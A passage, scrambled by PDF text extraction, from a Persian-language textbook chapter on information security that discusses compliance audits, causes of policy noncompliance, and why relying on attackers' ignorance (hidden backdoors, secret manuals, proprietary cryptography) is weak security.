‫ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺳﻴﺎﺳﺖ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ‬
‫ﻳﺎ ﻧﻪ‪ ،‬ﻭ ﺍﮔﺮ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ ﺁﻳﺎ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺳـﺖ ﻳـﺎ ﺧﻴـﺮ‪.‬‬
‫ﻭﺍﮊﺓ ﻣﻤﻴﺰﻱ‪ ٨٣‬ﺑﺎﺭ ﻣﻌﻨﺎﻳﻲ ﺟﺪﻳﺪﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ‬
‫ﺣﺪﺍﻗﻞ ﺩﺭ ﻣﻌﺎﻧﻲ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ‪ ،‬ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴﺮﻱ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒـﺖ(‪ ،‬ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺳﻴـﺴﺘﻢ‪ ،‬ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ﺭﻋﺎﻳـﺖ‬
‫‪۸۲‬‬
‫ﻳﻚ ﻣﻤﻴﺰ ﹺ‬
‫ﻱ ﺭﻋﺎﻳﺖ ﺳﻴﺎﺳﺖ‪ ٨٤‬ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺗﺎ ﻣﺸﺨﺺ ﮔﺮﺩﺩ ﺁﻳﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺫﻛﺮﺷـﺪﻩ ﺩﺭ‬
‫ﺳﻴﺎﺳﺖ ﺭﻋﺎﻳﺖ ﻣﻲﺷﻮﻧﺪ ﻳـﺎ ﻧـﻪ‪ ،‬ﻭ ﺍﮔـﺮ ﻧﻤـﻲﺷـﻮﻧﺪ ﺩﻟﻴـﻞ ﺁﻥ‬
‫ﻻ ﻣﻌﻴﺎﺭﻫــﺎ ﻭ ﺭﻭﺷــﻬﺎﻳﻲ ﺑــﺮﺍﻱ‬
‫ﭼﻴــﺴﺖ‪ .‬ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻌﻤــﻮ ﹰ‬
‫ﺳﻨﺠﻴﺪﻩﺷﺪﻥ ﺧﻮﺩ ﻧﻴﺰ ﺑﺪﺳﺖ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻚ‬
‫ﻣﻤﻴﺰ ﺑﺮﺍﻱ ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﺭﻋﺎﻳﺖﺷـﺪﻥ ﻳـﺎ ﻧـﺸﺪﻥ ﺁﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﮔﺮ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﻋﺎﻳﺖ ﻧـﺸﺪﻩ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﺔ ﻫﺮ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬
‫•‬
‫ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ‪ ،‬ﻧﻮﺷﺘﺔ ‪:Tom Kellermann‬‬
‫‪"The 12 Layer Matrix: Building a Cyber‬‬‫‪Fortress (2003)":‬‬
‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪ectorWeb.nsf/SearchGeneral?openform&E‬‬‫‪Security/E-Finance&Tools‬‬
‫‪Audit‬‬
‫ﺳﻴﺎﺳﺖ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫‪83‬‬
‫•‬
‫ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭﻛﻨﺎﻥ؛‬
‫ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻭ ﻓﻘﺪﺍﻥ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻻﺯﻡ؛‬
‫ﻛﺎﺭ ﺯﻳﺎﺩ؛‬
‫ﻧﻘﺺ ﺍﻣﻜﺎﻧﺎﺕ؛‬
‫ﻧﺪﺍﺷﺘﻦ ﺍﻧﮕﻴﺰﺓ ﻻﺯﻡ؛‬
‫ﻛﻤﺒﻮﺩ ﻭﺳﺎﻳﻞ ﻛﺎﻓﻲ؛‬
‫ﻣﻨﺎﺑﻊ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﻧﺎﻣﻨﺎﺳﺐ؛‬
‫ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺎﻛﺎﻓﻲ؛‬
‫ﻛﺎﺭﺑﺮﺩ ﻳﺎ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ؛‬
‫ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ؛‬
‫ﺑﻲﻣﺴﺌﻮﻟﻴﺘﻲ؛‬
‫ﺗﺪﺍﺧﻞ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛‬
‫ﺗﻘﺴﻴﻢ ﻛﺎﺭ ﻧﺎﻣﺸﺨﺺ‪ ،‬ﻧﺎﻫﻤﺎﻫﻨﮓ ﻭ ﮔﻴﺞﻛﻨﻨﺪﻩ؛‬
‫ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﻴﺎﺳﺖ؛‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﺶﺑﻴﻨﻲ ﻧﺸﺪﻩ؛‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻧﺎﻗﺺ ﻳﺎ ﺍﺯ ﻗﻠﻢ ﺍﻓﺘﺎﺩﻩ؛‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺘﺪﺍﺧﻞ؛ ﻭ‬
‫ﻧﺎﺳﺎﺯﮔﺎﺭﻱ ﺳﻴﺎﺳﺖ ﻭ ﻣﺤﻴﻂ‪.‬‬
‫ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻓﻬﺮﺳﺖ ﺑﺎﻻ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺳﻴﺎﺳـﺖ‬
‫ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺩﺍﻧﺴﺖ‪ .‬ﺣﺘـﻲ‬
‫ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﺍﺿـﺎﻓﻪﻛـﺎﺭ ﺑـﻴﺶ ﺍﺯ ﺣـﺪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﻱ ﺭﻋﺎﻳﺖ ﻧﺒﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﻧﻴﺴﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻳﻚ ﻣﻤﻴﺰ ﹺ‬
‫ﻓﺮﺁﻳﻨﺪ ﻧﺎﻣﻄﻠﻮﺏ ﺩﻳﺪﻩ ﺷﻮﺩ؛ ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺁﻥ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬
‫ﺗﻼﺵ ﻫﻤﮕﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ‪ ،‬ﻳﺎﻓﺘﻦ ﻭ ﺗﺨـﺼﻴﺺ‬
‫ﻣﺠﺪﺩ ﻣﻨﺎﺑﻊ‪ ،‬ﭘﺎﻻﻳﺶ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻭ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﮕﺮﻳـﺴﺖ‪ .‬ﻣـﺸﺎﺑﻪ ﻫﻤـﺔ ﻗـﺴﻤﺘﻬﺎﻱ‬
‫‪Compliance Audit Policy‬‬
‫‪84‬‬
‫‪١٥٥‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ‪ ،‬ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺭﻭﻳﻜﺮﺩ ﮔﺮﻭﻫﻲ ﺩﺭ ﺍﻛﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ‬
‫ﺷﺮﺍﻳﻂ ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﻭﻳﻜـﺮﺩ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ‬
‫ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ‪ ،‬ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻮﺏ ﺩﺳـﺖ‬
‫ﻳﺎﺑﻨﺪ‪ .‬ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫﺎﻳـﺸﺎﻥ‬
‫ﻛﻤــﻚ ﻛﻨــﻴﻢ‪ ،‬ﻧــﻪ ﺍﻳﻨﻜــﻪ ﺧــﻮﺩ ﺭﺍ ﺩﺭ ﻃــﺮﻑ ﺩﻳﮕــﺮ ﻣﻴــﺰ ﻭ ﺩﺭ‬
‫ﻣﻘﺎﺑﻠﺸﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﻢ‪.‬‬
‫ﺍﺷﻜﻼﺕ ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬﻞ ﻣﻬﺎﺟﻢ‬
‫ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻔﻬـﻮﻡ "ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﻻ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻮﻳﮋﻩ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ‬
‫ﺩﺍﻧﺴﺘﻦ" ﻣﻌﻤﻮ ﹰ‬
‫ﺻﺪﻕ ﻣﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺑـﺮ ﺍﻳـﻦ ﻣﺒﻨـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺎﺩﺍﻧﺴﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﺗﻜـﺎ‬
‫ﺑﻪ ﺟﻬﻞ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻤﻨﻲ ﺷﻤﺎ ﺧﺪﺷﻪ ﻭﺍﺭﺩ ﻛﻨﺪ‪.‬‬
‫ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺷﻜﺎﻻﺕ ﻳﺎ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﺣﻔﺎﻇـﺖ‬
‫ﺩﺭ ﻣﻘﺎﺑــﻞ ﺁﻧﻬــﺎ ﻧﻴــﺰ ﻳــﻚ ﺭﻭﻳﻜــﺮﺩ ﺿــﻌﻴﻒ ﺍﻣﻨﻴﺘــﻲ ﺍﺳــﺖ‪.‬‬
‫ﻻ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﺏ ﻣﺨﻔﻲ ﻗﺮﺍﺭ‬
‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﺑـﺪﻭﻥ ﺍﺭﺍﺋـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ‪،‬‬
‫ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻧﺪ‪ .‬ﮔﺎﻫﻲ ﻧﻴﺰ ﺍﺷﻜﺎﻻﺕ ﺳﻴـﺴﺘﻢ‬
‫ﺑﺎ ﻋﻮﺍﺭﺽ ﻋﻤﻴﻖ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻣـﺪﻳﺮ‬
‫ﺗﺼﻮﺭ ﻣﻲﻛﻨﺪ ﻛﺴﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﻧﺪﺍﺭﺩ‪ .‬ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ‬
‫ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺸﻜﻼﺕ ﻭ‬
‫ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻳﺎ ﺑﻮﺳﻴﻠﺔ ﻳـﻚ‬
‫ﻧﻔﻮﺫﮔﺮ ﻣﺼﻤﻢ ﻛﺸﻒ ﺷـﻮﻧﺪ‪ .‬ﻣﺨﻔـﻲ ﻧﮕﻬﺪﺍﺷـﺘﻦ ﺍﺷـﻜﺎﻻﺕ ﻭ‬
‫ﻭﻳﮋﮔﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻣﻮﺭﺩ ﻣﺸﺎﻫﺪﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﻭ‬
‫ﻃﺒﻴﻌﺘﹰﺎ ﺍﺻﻼﺡﻧﺸﺪﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨـﺪ‪ .‬ﻟـﺬﺍ ﭘـﺲ ﺍﺯ ﺁﻧﻜـﻪ ﻛـﺸﻒ‬
‫ﺷﺪﻧﺪ‪ ،‬ﻭﺟﻮﺩ ﻣﺸﻜﻞ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺗﻤـﺎﻡ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ‬
‫ﻧــﺴﺒﺖ ﺑــﻪ ﺣﻤﻠــﺔ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﻣــﺸﻜﻞ ﺭﺍ ﻛــﺸﻒ ﻛــﺮﺩﻩﺍﻧــﺪ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﺤﻴﻄﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺪﻳﺮﻳﺖ ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴـﺮﺩ‬
‫ﻛﺘﺎﺑﭽﻪ ﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﺭﺍ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﻭﺭ ﻧﮕـﻪ ﺩﺍﺭﺩ ﺗـﺎ‬
‫ﺍﺟﺎﺯﻩ ﻧﺪﻫﺪ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺍﻣﻴﻦ ﻭ ﮔﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ‬
‫ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺧﺪﺷـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩ ﻣﻄﻠﺒـﻲ ﺑﻴﺎﻣﻮﺯﻧـﺪ‪ .‬ﺩﺭ‬
‫ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﻣﺪﻳﺮﺍﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﺑﺎﺷـﻨﺪ ﻛـﻪ‬
‫ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩﺍﻧﺪ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﻭﺍﻗـﻊ ﺍﻳﻨﻄـﻮﺭ‬
‫ﻧﻴﺴﺖ‪ .‬ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺼﻤﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺭﺍ ﺟﺎﻱ ﺩﻳﮕﺮﻱ‬
‫ﭘﻴﺪﺍ ﻛﻨﺪ ‪ -‬ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺍﺩﺍﺭﺍﺕ ﺩﻳﮕﺮ‪ .‬ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ‬
‫ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺩﺭ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻤﺘﺮ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻛﺘﺎﺑﻔﺮﻭﺷﻲ ﺑﻪ ﻫـﺮ‬
‫ﺍﺩﺍﺭﻩ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ! ﻣﺪﻳﺮﻳﺖ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﻫﻤﺔ ﺭﺍﻫﻬﺎﻱ ﻳﺎﺩﮔﻴﺮﻱ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺒﻨﺪﺩ‪ .‬ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺩﻟﻴﻞ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﻨﺎﺩ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻛﺎﺭﺁﺗﺮ‬
‫ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ﻳـﺎ‬
‫‪85‬‬
‫‪86‬‬
‫‪Inferential Security‬‬
‫ﻼ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ‬
‫ﺍﺭﺯﺵ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ ‪ -‬ﻣـﺜ ﹰ‬
‫ﺍﻧﺤﺼﺎﺭﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ -‬ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ‪ .‬ﺗﺎ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ‬
‫ﻣﺘﺨﺼﺺ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ٨٦‬ﻧﺒﺎﺷﻴﺪ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ ﻗـﺪﺭﺕ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺭﺍ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ‪ .‬ﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ‬
‫ﻧﻘﺎﻳﺺ ﺟﺪﻱ ﺍﺳﺖ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲ ﺷـﻮﺩ‬
‫ﻃﺒﻴﻌﺘﹰﺎ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻧﻤـﻲﮔﻴـﺮﺩ ﻭ ﻟـﺬﺍ ﻫـﺮ‬
‫ﻛﺴﻲ ﻛﻪ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺁﻥ ﺑﻴﺎﺑﺪ ﺧﻮﺍﻫـﺪ ﺗﻮﺍﻧـﺴﺖ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ‬
‫ﺷﻤﺎ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺘﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬
‫‪Cryptography‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻲ ﺍﻣﻨﻴﺖ ﻛﻪ ﻋﻤﺪﺗﹰﺎ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﺭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺳﻨﺘ ﹺ‬
‫ﺍﺭﺗﺶ ﻧﺸﺄﺕ ﻣﻲﮔﺮﻓﺖ ﻳﻚ ﻣﻔﻬﻮﻡ ﺑﺎ ﻋﻨﻮﺍﻥ "ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧـﺴﺘﻦ"‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﻣﻲﺷﺪ ﻭ ﺑﻪ ﻫﺮ ﻛﺲ ﺁﻧﻘﺪﺭ‬
‫ﺍﺯ ﺁﻥ ﺗﺨﺼﻴﺺ ﻣﻲﻳﺎﻓﺖ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﺁﻥ ﺑـﻪ ﻭﻇـﺎﻳﻔﺶ ﻋﻤـﻞ‬
‫ﻛﻨــﺪ‪ .‬ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻳﻲ ﻛــﻪ ﻗــﺴﻤﺘﻬﺎﻱ ﺧﺎﺻــﻲ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ‬
‫ﺣﺴﺎﺳﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻳﺎ ﺍﻣﻨﻴﺖ ﺍﺳﺘﻨﺒﺎﻃﻲ‪ ٨٥‬ﺑﺎﻳﺪ ﺑﺮﻗـﺮﺍﺭ ﺑﺎﺷـﺪ‪،‬‬
‫ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺍﺯ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺍﮔـﺮ ﺳـﻪ ﻗﻄﻌـﺔ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺘﻮﺍﻧﻨﺪ ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺨﺮﺏ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻭﺭﻧﺪ‬
‫ﻭﻟﻲ ﻫﻴﭽﻜﺲ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﻗﻄﻌﻪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﻄﻠﺐ ﺑﻴﺎﻣﻮﺯﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑﻬـﺮﺓ ﺑـﺴﻴﺎﺭ ﻛﻤـﻲ‬
‫ﺑﺒﺮﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﮕﻴـﺰﺓ ﺍﻳـﺸﺎﻥ ﺗـﻀﻌﻴﻒ ﺷـﻮﺩ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﭘﻴﺎﻡ ﺿﻤﻨﻲ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﻣﺎ ﺑﻪ‬
‫ﺷﻤﺎ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻣﻞ ﻧـﺪﺍﺭﻳﻢ ﻛـﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻣـﺴﺌﻮﻟﻴﺖﺷـﻨﺎﺱ‬
‫ﺑﺎﺷﻴﺪ"‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺍﮔـﺮ ﻛـﺴﻲ ﺑـﻪ ﺳـﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﻭ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﭙﺮﺩﺍﺯﺩ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻣﺪﻳﺮﻳﺖ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺷـﻨﺎﺧﺖ ﻭ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ ﻣـﺸﻜﻞ ﺭﺍ‬
